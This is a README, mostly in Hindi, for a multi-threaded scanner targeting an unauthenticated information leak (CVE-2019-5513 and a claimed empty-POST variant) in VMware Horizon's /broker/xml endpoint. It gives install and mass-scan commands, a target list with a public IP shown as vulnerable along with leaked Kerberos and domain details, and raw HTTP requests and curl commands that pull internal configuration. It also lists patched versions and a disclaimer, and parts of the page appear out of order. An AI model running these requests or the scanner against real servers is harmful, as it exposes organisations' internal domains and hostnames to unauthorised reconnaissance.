
The VMWare Horizon Connection Server is often used as an internet-facing gateway to an organization’s virtual desktop environment (VDI). Until recently, most of these installations exposed the Connection Server’s internal name, the gateway’s internal IP address, and the Active Directory domain to unauthenticated attackers.
VMware Horizon Connection Server के /broker/xml एंडपॉइंट में अप्रमाणित जानकारी प्रकटीकरण भेद्यताओं का पता लगाने के लिए एक उच्च-प्रदर्शन मल्टी-थ्रेडेड स्कैनर।
VMware Horizon Connection Server एक XML API एंडपॉइंट (/broker/xml) को उजागर करता है जो प्रमाणीकरण की आवश्यकता के बिना संवेदनशील आंतरिक कॉन्फ़िगरेशन जानकारी लीक कर सकता है। यह स्कैनर दो आक्रमण वैक्टर का परीक्षण करके तेजी से कमजोर सर्वरों की पहचान करता है:
get-configuration XML कमांड का उपयोग करता है।<?xml version="1.0" encoding="utf-8"?>
<broker>
<configuration>
<broker-service-principal>
<type>kerberos</type>
<name>[email protected]</name>
</broker-service-principal>
<domain>corporate-domain.example.com</domain>
</configuration>
</broker>
# Clone the repository
git clone https://github.com/sudosu01/CVE-2019-5513-scanner.git
cd vmware-horizon-scanner
# Make the script executable
chmod +x broker.sh
./broker.sh -d targets.txt
./broker.sh -d targets.txt -t 100
./broker.sh -d targets.txt -t 100 -o results.txt
| विकल्प | विवरण |
|---|---|
-d <file> | आईपी पते/होस्टनामों की सूची वाली इनपुट फ़ाइल (प्रति पंक्ति एक) |
-t <num> | थ्रेड्स की संख्या (डिफ़ॉल्ट: 50) |
# Comments start with #
185.171.101.236
192.168.1.100
10.0.0.50
example-vmware.com
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
VMware Horizon /broker/xml Vulnerability Scanner
Multi-Threaded Mode - 50 threads
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[*] Testing: Empty POST (Zero-Day) + Crafted XML (CVE-2019-5513)
[*] Protocols: HTTPS + HTTP (both tested simultaneously)
[*] Scanning 3 hosts...
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[+] 185.171.101.236 | VULNERABLE | HTTPS | EMPTY_POST
Response:
<?xml version="1.0" encoding="utf-8"?>
<broker>
<configuration>
<broker-service-principal>
<type>kerberos</type>
<name>TEST-SERVER$@DOMAIN</name>
</broker-service-principal>
</configuration>
</broker>
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[-] 192.168.1.100 | NOT VULNERABLE
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[+] 10.0.0.50 | VULNERABLE | HTTP | CRAFTED_XML
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[*] SCAN COMPLETE
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Total hosts: 3
Vulnerable: 2
Not vulnerable: 1
Time taken: 4 seconds
मैन्युअल परीक्षण के लिए, यहां कच्चे अनुरोध हैं:
POST /broker/xml HTTP/1.1
Host: target.example.com
Content-Type: text/xml
User-Agent: VMware-Horizon-Client
Content-Length: 0
POST /broker/xml HTTP/1.1
Host: target.example.com
Content-Type: text/xml
User-Agent: VMware-Horizon-Client
Content-Length: 115
<?xml version='1.0' encoding='UTF-8'?><broker version='10.0'><get-configuration></get-configuration></broker>
curl -k -X POST "https://target/broker/xml" \
-H "Content-Type: text/xml" \
-H "User-Agent: VMware-Horizon-Client" \
-d ''
curl -k -X POST "https://target/broker/xml" \
-H "Content-Type: text/xml" \
-H "User-Agent: VMware-Horizon-Client" \
--data-binary '<?xml version="1.0" encoding="UTF-8"?><broker version="10.0"><get-configuration></get-configuration></broker>'
VMware Horizon Connection Server को पैच किए गए संस्करण में अपग्रेड करें:
| संस्करण | निर्धारित रिलीज़ |
|---|---|
| 7.x | 7.8 या बाद का |
| 7.5.x | 7.5.2 या बाद का |
| 6.x | 6.2.8 या बाद का |
/broker/xml एंडपॉइंट तक पहुंच को प्रतिबंधित करने के लिए नेटवर्क एक्सेस नियंत्रण लागू करें/broker/xml पर संदिग्ध POST अनुरोधों की निगरानी करेंयह उपकरण निम्नलिखित सुरक्षा शोधकर्ताओं के शोध पर आधारित है:
खाली POST बॉडी आक्रमण वेक्टर अतिरिक्त शोध के दौरान पहचाना गया था। मूल CVE के लिए एक निर्मित XML पेलोड की आवश्यकता थी; यह उपकरण खाली बॉडी विधि का भी परीक्षण करता है, जिसमें कोई पेलोड निर्माण की आवश्यकता नहीं है और इसे निष्पादित करना और भी सरल है।
यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है। उन सिस्टमों की अनधिकृत स्कैनिंग जो आपके स्वामित्व में नहीं हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति नहीं है, कानूनों और विनियमों का उल्लंघन कर सकती है। लेखक दुरुपयोग के लिए कोई दायित्व नहीं मानते हैं।
MIT License
यदि आपको यह उपकरण उपयोगी लगता है, तो कृपया इसे GitHub पर एक स्टार दें!
| गुण | मान |
|---|
| CVE | CVE-2019-5513 |
| CVSS स्कोर | 5.3 (मध्यम) |
| वेक्टर | AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N |
| प्रभावित उत्पाद | VMware Horizon Connection Server 7.x before 7.8, 7.5.x before 7.5.2, 6.x before 6.2.8 |
| लीक हुई जानकारी | एक्टिव डायरेक्टरी डोमेन नाम, सेवा खाता नाम (मशीन खाता), आंतरिक होस्टनाम, गेटवे आईपी पते |
-o <file> | परिणाम सहेजने के लिए आउटपुट फ़ाइल |
-h | सहायता संदेश दिखाएं |